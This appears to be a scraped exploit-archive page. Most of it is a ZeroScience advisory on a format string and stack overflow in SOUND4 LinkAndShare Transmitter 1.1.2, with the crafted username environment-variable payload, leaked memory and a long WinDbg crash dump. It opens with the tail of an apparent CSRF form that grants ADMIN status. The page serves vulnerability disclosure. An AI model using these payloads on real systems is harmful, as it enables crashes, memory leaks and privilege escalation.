blue" style="font-size:20px; padding-left:10px; width:300px; ">Image Profile (เลือกรูปโปรไฟล์ ขนาด 200x200)</label><br /> </div><br /> <br /> <div class="zero-clipboard"><span class="btn-clipboard with-example" style="font-size:18px; color:#09F;">Status (สถานะ)</span></div><div class="bs-example"><br /> <br /> <select class="form-control" name="Status"><br /> <option value="USER">USER</option><br /> <option value="ADMIN">ADMIN</option><br /> </select><br /><br /> </div><br /><br /> <input type="submit" value="บันทึก" class="button_m raised green" style="border:none; font-family:Conv_thaisanslite_r1;"/><br /> <br /></form> <br /><br /></body><br /></html><br /><br />[+] Go to the line 46.<br /><br />[+] Set the target site link Save changes and apply .<br /><br />Greetings to :===================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet| <br />==================================================================================================<br /></code></pre>
<pre><code><br />SOUND4 LinkAndShare Transmitter 1.1.2 Format String Stack Buffer Overflow<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: 1.1.2<br /><br />Summary: The SOUND4 Link&Share (L&S) is a simple and open protocol that<br />allow users to remotely control SOUND4 processors through a network connection.<br />SOUND4 offers a tool that manage sending L&S commands to your processors:<br />the Link&Share Transmitter.<br /><br />Desc: The application suffers from a format string memory leak and stack<br />buffer overflow vulnerability because it fails to properly sanitize user<br />supplied input when calling the getenv() function from MSVCR120.DLL resulting<br />in a crash overflowing the memory stack and leaking sensitive information.<br />The attacker can abuse the username environment variable to trigger and<br />potentially execute code on the affected system.<br /><br />---------------------------------------------------------------------------<br />(4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!)<br />eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000<br />eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202<br />MSVCR120!_invoke_watson+0xe:<br />645046b1 cd29 int 29h<br />---------------------------------------------------------------------------<br /><br />Tested on: Microsoft Windows 10 Home<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5744<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5744.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDd%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br /><br />C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe<br /><br />C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>02/02/23 17:06:19 : : Internal Error: can not replace file with temp file<br />02/02/23 17:06:19 : Background launch: User: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDd00000000013872CB0000000A012FF644776BE9250200000277666A78C60003C50000000077651CFC00000000012FF8B07770C59F0138F9D832EC2962011AE00000000000011B100000000001FFFFFC3E012FF814776A7252776A8D3B32EC29C60138000000000440012FF8B00138F0EC013889420000000001386DB000000006000000003B00003B00001000000000060000000301380294013800000200000200000000C60003C57769517C000000000000000100000000012FF764012FF75877694F2600FC000000FC0000012FF79800000008000003010000033C000000010139CF800000000000000087FFFFFCC40000000000000000000001F4013800010010002F00000001000000010000000002020002536E6957206B636F00302E3201380000012FF76400000000000007FF000003C5013800C0013899A4FFFFFFFE012FF7CC00000000000000000138CD100000008900000001000000000000033C012FF7CC000003450000000077694D110138C148000004480138CD10012FF800013800C001380000002C000200000001010001000000033C0139CF78012FF788000002BC0139CF780139CF8044B51122000000000000000000000AF00000000077694A9C770100BA01389918002FF8883B00003B000000000000033C013899180139CF7F00000000012FF7E0012FFB64776DAE6044B517CAFFFFFFFE012FF8A8776A6F0C00000440012FF9CC776A7252776A8D3B6E75521E676E696E00000200012FFA680138CD10012FF8687769470000000000012FF888776610783B00003B776D2D2C00000448FFFFFFFF00EC8D180000000002000002000000003F00033C00000003FFFFFFFF0000000000EC8D180139CF80002C0000000004400000000000EC8D180138000000EB0000000002BF000002FA0000510A32EC00000139D3C0013800000000000000EC8D18229F00000138898C0000002000000001012FFB103B00003BD1B0FD8E0000000000ECB3AC61636F6C736F686C0138007400051000000000090000000F34303033013800000138999000630069000000040000000F000000000069006400000080006F0056000000000000000F013927F8000002BC0000033C006100720000002F0000002F0065000000200073013800C00139D3C0000000000000000F010001000000004200000001006E0069000000000000000F0139D300013803AC000000010138C148000000000000000F000000000001007401389918013800C03B00003B0139D3C8000000000101991800000000013800C0006E00610000033C013A78A044B50000FFFFFF0000000AF0000000350000003F01389918010103AC000002BC0000002000260007012FFA88013AB160012FFA80776A634F0000004F00000B4000000B4F01380000776E7BC40139D3C80000002000180017012FFAB801392504012FFAB0776A634F00000051000000200000000E01380000012FFA44012FFA8C01399FE8012FFA5432EC2BEA0000003C776C4EB00139FE0C000000400000000E00ECA7300000000D000000000139FE10012FFA9067F0C042012FFA8867EEEE0C67fc0e0012ffac867ef2b40867f0bf8167f0bfbcc25352e4e776c4eb0deca73012ffac8776bac49512ffac412ffb0c1399fe812ffad432ec2b6a512ffafc67eef8c70012ffb0c67eef8d612ffb0c67eef90b013872ca12ffb1c67f0e537013872ca139c3e0139eda81399fe8eb1b0112ffb3467f0e5849094dec12ffb74ec89edeb0000013872cba9094db0ec88beec88be11ae0000013872cb12ffb40012ffbd0ec8ae98cba554012ffb8476f700f911ae00076f700e012ffbe0776c7bbe11ae00032ec2a320011ae000000000000012ffb90012ffbe8776dae6044b51d72012ffbf0776c7b8effffffff776e8d1d00ec88be11ae0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br /><br /><br />---<br /><br /><br />C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=%n<br />C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe<br /><br />(4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!)<br />eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000<br />eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202<br />MSVCR120!_invoke_watson+0xe:<br />645046b1 cd29 int 29h<br />0:000> kb<br /> # ChildEBP RetAddr Args to Child <br />00 0119f0b4 64504677 00000000 00000000 00000000 MSVCR120!_invoke_watson+0xe [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132] <br />01 0119f0d0 64504684 00000000 00000000 00000000 MSVCR120!_invalid_parameter+0x2a [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 85] <br />02 0119f0e8 644757a7 0119f3bc 016b3908 016b3908 MSVCR120!_invalid_parameter_noinfo+0xc [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 96] <br />03 0119f37c 644e4d1f 0119f39c 016b2ba0 00000000 MSVCR120!_output_l+0xb49 [f:\dd\vctools\crt\crtw32\stdio\output.c @ 1690] <br />04 0119f3bc 644e4c99 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf_l+0x81 [f:\dd\vctools\crt\crtw32\stdio\vsprintf.c @ 138] <br />*** WARNING: Unable to verify checksum for c:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter\LinkAndShareTransmitter.exe<br />*** ERROR: Module load completed but symbols could not be loaded for c:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter\LinkAndShareTransmitter.exe<br />05 0119f3d8 0100bb11 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf+0x16 [f:\dd\vctools\crt\crtw32\stdio\vsprintf.c @ 190] <br />WARNING: Stack unwind information not available. Following frames may be wrong.<br />06 0119f498 0100bc9f 016b2ba0 0119f4b4 0119f9c4 LinkAndShareTransmitter+0xbb11<br />07 0119f4a8 01002f58 016b2ba0 00000000 01687ffb LinkAndShareTransmitter+0xbc9f<br />08 0119f9c4 010189ed 01000000 00000000 01687ffb LinkAndShareTransmitter+0x2f58<br />09 0119fa10 76f700f9 01323000 76f700e0 0119fa7c LinkAndShareTransmitter+0x189ed<br />0a 0119fa20 776c7bbe 01323000 c0289fff 00000000 KERNEL32!BaseThreadInitThunk+0x19<br />0b 0119fa7c 776c7b8e ffffffff 776e8d13 00000000 ntdll!__RtlUserThreadStart+0x2f<br />0c 0119fa8c 00000000 010188be 01323000 00000000 ntdll!_RtlUserThreadStart+0x1b<br />0:000> !analyze -v<br />*******************************************************************************<br />* *<br />* Exception Analysis *<br />* *<br />*******************************************************************************<br /><br />GetUrlPageData2 (WinHttp) failed: 12002.<br />DUMP_CLASS: 2<br />DUMP_QUALIFIER: 0<br />FAULTING_IP: <br />MSVCR120!_invoke_watson+e [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132]<br />645046b1 cd29 int 29h<br /><br />EXCEPTION_RECORD: (.exr -1)<br />ExceptionAddress: 645046b1 (MSVCR120!_invoke_watson+0x0000000e)<br /> ExceptionCode: c0000409 (Security check failure or stack buffer overrun)<br /> ExceptionFlags: 00000001<br />NumberParameters: 1<br /> Parameter[0]: 00000005<br />Subcode: 0x5 FAST_FAIL_INVALID_ARG<br /><br />FAULTING_THREAD: 000059e8<br />DEFAULT_BUCKET_ID: FAIL_FAST_INVALID_ARG<br />PROCESS_NAME: LinkAndShareTransmitter.exe<br />ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.<br />EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.<br />EXCEPTION_CODE_STR: c0000409<br />EXCEPTION_PARAMETER1: 00000005<br />WATSON_BKT_PROCSTAMP: 6144495e<br />WATSON_BKT_PROCVER: 1.1.0.2<br />PROCESS_VER_PRODUCT: Sound4 Link&Share Transmitter<br />WATSON_BKT_MODULE: MSVCR120.dll<br />WATSON_BKT_MODSTAMP: 577e0f1e<br />WATSON_BKT_MODOFFSET: a46b1<br />WATSON_BKT_MODVER: 12.0.40660.0<br />MODULE_VER_PRODUCT: Microsoft® Visual Studio® 2013<br />BUILD_VERSION_STRING: 10.0.19041.2364 (WinBuild.160101.0800)<br />MODLIST_WITH_TSCHKSUM_HASH: 938db164a2b944fa7c2a5efef0c4e9b0f4b8e3d5<br />MODLIST_SHA1_HASH: 5990094944fb37a3f4c159affa51a53b6a58ac20<br />NTGLOBALFLAG: 70<br />APPLICATION_VERIFIER_FLAGS: 0<br />PRODUCT_TYPE: 1<br />SUITE_MASK: 784<br />DUMP_TYPE: fe<br />ANALYSIS_SESSION_HOST: LAB17<br />ANALYSIS_SESSION_TIME: 01-29-2023 16:09:48.0143<br />ANALYSIS_VERSION: 10.0.16299.91 x86fre<br />THREAD_ATTRIBUTES: <br />OS_LOCALE: ENU<br /><br />PROBLEM_CLASSES: <br /><br /> ID: [0n270]<br /> Type: [FAIL_FAST]<br /> Class: Primary<br /> Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)<br /> BUCKET_ID<br /> Name: Add<br /> Data: Omit<br /> PID: [Unspecified]<br /> TID: [Unspecified]<br /> Frame: [0]<br /><br /> ID: [0n257]<br /> Type: [INVALID_ARG]<br /> Class: Addendum<br /> Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)<br /> BUCKET_ID<br /> Name: Add<br /> Data: Omit<br /> PID: [Unspecified]<br /> TID: [Unspecified]<br /> Frame: [0]<br /><br />BUGCHECK_STR: FAIL_FAST_INVALID_ARG<br />PRIMARY_PROBLEM_CLASS: FAIL_FAST<br />LAST_CONTROL_TRANSFER: from 64504677 to 645046b1<br /><br />STACK_TEXT: <br />0119f0b4 64504677 00000000 00000000 00000000 MSVCR120!_invoke_watson+0xe<br />0119f0d0 64504684 00000000 00000000 00000000 MSVCR120!_invalid_parameter+0x2a<br />0119f0e8 644757a7 0119f3bc 016b3908 016b3908 MSVCR120!_invalid_parameter_noinfo+0xc<br />0119f37c 644e4d1f 0119f39c 016b2ba0 00000000 MSVCR120!_output_l+0xb49<br />0119f3bc 644e4c99 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf_l+0x81<br />0119f3d8 0100bb11 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf+0x16<br />WARNING: Stack unwind information not available. Following frames may be wrong.<br />0119f498 0100bc9f 016b2ba0 0119f4b4 0119f9c4 LinkAndShareTransmitter+0xbb11<br />0119f4a8 01002f58 016b2ba0 00000000 01687ffb LinkAndShareTransmitter+0xbc9f<br />0119f9c4 010189ed 01000000 00000000 01687ffb LinkAndShareTransmitter+0x2f58<br />0119fa10 76f700f9 01323000 76f700e0 0119fa7c LinkAndShareTransmitter+0x189ed<br />0119fa20 776c7bbe 01323000 c0289fff 00000000 KERNEL32!BaseThreadInitThunk+0x19<br />0119fa7c 776c7b8e ffffffff 776e8d13 00000000 ntdll!__RtlUserThreadStart+0x2f<br />0119fa8c 00000000 010188be 01323000 00000000 ntdll!_RtlUserThreadStart+0x1b<br /><br />STACK_COMMAND: ~0s ; .cxr ; kb<br />THREAD_SHA1_HASH_MOD_FUNC: 0b8f8316052b30cae637e16edbb425a676500e95<br />THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 359d5607a5627480201647a1bc659e9d2ac9281f<br />THREAD_SHA1_HASH_MOD: 2418d74468f3882fef267f455cd32d7651645882<br /><br />FOLLOWUP_IP: <br />MSVCR120!_invoke_watson+e [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132]<br />645046b1 cd29 int 29h<br /><br />FAULT_INSTR_CODE: 6a5629cd<br />FAULTING_SOURCE_LINE: f:\dd\vctools\crt\crtw32\misc\invarg.c<br />FAULTING_SOURCE_FILE: f:\dd\vctools\crt\crtw32\misc\invarg.c<br />FAULTING_SOURCE_LINE_NUMBER: 132<br />SYMBOL_STACK_INDEX: 0<br />SYMBOL_NAME: MSVCR120!_invoke_watson+e<br />FOLLOWUP_NAME: MachineOwner<br />MODULE_NAME: MSVCR120<br />IMAGE_NAME: MSVCR120.dll<br />DEBUG_FLR_IMAGE_TIMESTAMP: 577e0f1e<br />BUCKET_ID: FAIL_FAST_INVALID_ARG_MSVCR120!_invoke_watson+e<br />FAILURE_EXCEPTION_CODE: c0000409<br />FAILURE_IMAGE_NAME: MSVCR120.dll<br />BUCKET_ID_IMAGE_STR: MSVCR120.dll<br />FAILURE_MODULE_NAME: MSVCR120<br />BUCKET_ID_MODULE_STR: MSVCR120<br />FAILURE_FUNCTION_NAME: _invoke_watson<br />BUCKET_ID_FUNCTION_STR: _invoke_watson<br />BUCKET_ID_OFFSET: e<br />BUCKET_ID_MODTIMEDATESTAMP: 577e0f1e<br />BUCKET_ID_MODCHECKSUM: f8aef<br />BUCKET_ID_MODVER_STR: 12.0.40660.0<br />BUCKET_ID_PREFIX_STR: FAIL_FAST_INVALID_ARG_<br />FAILURE_PROBLEM_CLASS: FAIL_FAST<br />FAILURE_SYMBOL_NAME: MSVCR120.dll!_invoke_watson<br />FAILURE_BUCKET_ID: FAIL_FAST_INVALID_ARG_c0000409_MSVCR120.dll!_invoke_watson<br />WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/LinkAndShareTransmitter.exe/1.1.0.2/6144495e/MSVCR120.dll/12.0.40660.0/577e0f1e/c0000409/000a46b1.htm?Retriage=1<br />TARGET_TIME: 2023-01-29T15:09:52.000Z<br />OSBUILD: 19044<br />OSSERVICEPACK: 2364<br />SERVICEPACK_NUMBER: 0<br />OS_REVISION: 0<br />OSPLATFORM_TYPE: x86<br />OSNAME: Windows 10<br />OSEDITION: Windows 10 WinNt SingleUserTS Personal<br />USER_LCID: 0<br />OSBUILD_TIMESTAMP: 2008-01-07 11:33:18<br />BUILDDATESTAMP_STR: 160101.0800<br />BUILDLAB_STR: WinBuild<br />BUILDOSVER_STR: 10.0.19041.2364<br />ANALYSIS_SESSION_ELAPSED_TIME: 635d<br />ANALYSIS_SOURCE: UM<br />FAILURE_ID_HASH_STRING: um:fail_fast_invalid_arg_c0000409_msvcr120.dll!_invoke_watson<br />FAILURE_ID_HASH: {c9fee478-4ed1-0d2b-ddd7-dca655d9817f}<br /><br />Followup: MachineOwner<br />---------<br /><br />0:000> d MSVCP120<br />70fb0000 4d 5a 90 00 03 00 00 00-04 00 00 00 ff ff 00 00 MZ..............<br />70fb0010 b8 00 00 00 00 00 00 00-40 00 00 00 00 00 00 00 ........@.......<br />70fb0020 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................<br />70fb0030 00 00 00 00 00 00 00 00-00 00 00 00 f8 00 00 00 ................<br />70fb0040 0e 1f ba 0e 00 b4 09 cd-21 b8 01 4c cd 21 54 68 ........!..L.!Th<br />70fb0050 69 73 20 70 72 6f 67 72-61 6d 20 63 61 6e 6e 6f is program canno<br />70fb0060 74 20 62 65 20 72 75 6e-20 69 6e 20 44 4f 53 20 t be run in DOS <br />70fb0070 6d 6f 64 65 2e 0d 0d 0a-24 00 00 00 00 00 00 00 mode....$.......<br />0:000> lmvm MSVCR120<br />Browse full module list<br />start end module name<br />64460000 6454e000 MSVCR120 (private pdb symbols) C:\ProgramData\dbg\sym\msvcr120.i386.pdb\4D11E607E50346DDAB0C2C4FFC8716112\msvcr120.i386.pdb<br /> Loaded symbol image file: C:\WINDOWS\SYSTEM32\MSVCR120.dll<br /> Image path: C:\WINDOWS\SysWOW64\MSVCR120.dll<br /> Image name: MSVCR120.dll<br /> Browse all global symbols functions data<br /> Timestamp: Thu Jul 7 10:13:18 2016 (577E0F1E)<br /> CheckSum: 000F8AEF<br /> ImageSize: 000EE000<br /> File version: 12.0.40660.0<br /> Product version: 12.0.40660.0<br /> File flags: 0 (Mask 3F)<br /> File OS: 4 Unknown Win32<br /> File type: 2.0 Dll<br /> File date: 00000000.00000000<br /> Translations: 0409.04b0<br /> CompanyName: Microsoft Corporation<br /> ProductName: Microsoft® Visual Studio® 2013<br /> InternalName: msvcr120.dll<br /> OriginalFilename: msvcr120.dll<br /> ProductVersion: 12.00.40660.0<br /> FileVersion: 12.00.40660.0 built by: VSULDR<br /> FileDescription: Microsoft® C Runtime Library<br /> LegalCopyright: © Microsoft Corporation. All rights reserved.<br />0:000> x /D /f MSVCR120!getenv<br /> MSVCR120!getenv (char *)<br />0:000> x /D /f MSVCR120!getenv<br />64477785 MSVCR120!getenv (char *)<br />..<br />0:000> u 64477785<br />MSVCR120!getenv [f:\dd\vctools\crt\crtw32\misc\getenv.c @ 75]:<br />64477785 6a0c push 0Ch<br />64477787 68f0774764 push offset MSVCR120!_CT??_R0?AVbad_caststd+0x66c (644777f0)<br />6447778c e8ea75ffff call MSVCR120!__SEH_prolog4 (6446ed7b)<br />64477791 8365e400 and dword ptr [ebp-1Ch],0<br />64477795 33c0 xor eax,eax<br />64477797 8b7508 mov esi,dword ptr [ebp+8]<br />6447779a 85f6 test esi,esi<br />6447779c 0f95c0 setne al<br />0:000> r<br />eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000<br />eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202<br />MSVCR120!_invoke_watson+0xe:<br />645046b1 cd29 int 29h<br />0:000> u 645046b1<br />MSVCR120!_invoke_watson+0xe [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132]:<br />645046b1 cd29 int 29h<br />645046b3 56 push esi<br />645046b4 6a01 push 1<br />645046b6 be170400c0 mov esi,0C0000417h<br />645046bb 56 push esi<br />645046bc 6a02 push 2<br />645046be e85efeffff call MSVCR120!_call_reportfault (64504521)<br />645046c3 56 push esi<br />0:000> u 64477785<br />MSVCR120!getenv [f:\dd\vctools\crt\crtw32\misc\getenv.c @ 75]:<br />64477785 6a0c push 0Ch<br />64477787 68f0774764 push offset MSVCR120!_CT??_R0?AVbad_caststd+0x66c (644777f0)<br />6447778c e8ea75ffff call MSVCR120!__SEH_prolog4 (6446ed7b)<br />64477791 8365e400 and dword ptr [ebp-1Ch],0<br />64477795 33c0 xor eax,eax<br />64477797 8b7508 mov esi,dword ptr [ebp+8]<br />6447779a 85f6 test esi,esi<br />6447779c 0f95c0 setne al<br />0:000> g<br />WARNING: Continuing a non-continuable exception<br />(4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!)<br />eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000<br />eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202<br />MSVCR120!_invoke_watson+0xe:<br />645046b1 cd29 int 